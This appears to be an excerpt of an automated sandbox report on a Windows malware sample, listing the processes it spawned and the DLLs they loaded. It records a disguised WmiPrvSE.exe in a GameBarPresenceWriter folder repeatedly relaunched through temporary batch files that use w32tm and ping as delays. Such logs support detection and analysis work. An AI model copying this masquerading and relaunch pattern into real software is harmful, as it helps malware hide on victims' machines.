Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g6UJbp2Exv.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grDS520PRI.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FYUTXnTyLD.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KvMN3vAFGm.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9O9rrJCHDg.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BBca1gliPd.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BLXo76X4ph.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gA6Kj9AC8z.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yRPxJCkWkW.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g6UJbp2Exv.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grDS520PRI.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FYUTXnTyLD.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KvMN3vAFGm.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9O9rrJCHDg.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BBca1gliPd.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BLXo76X4ph.bat"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wldp.dll
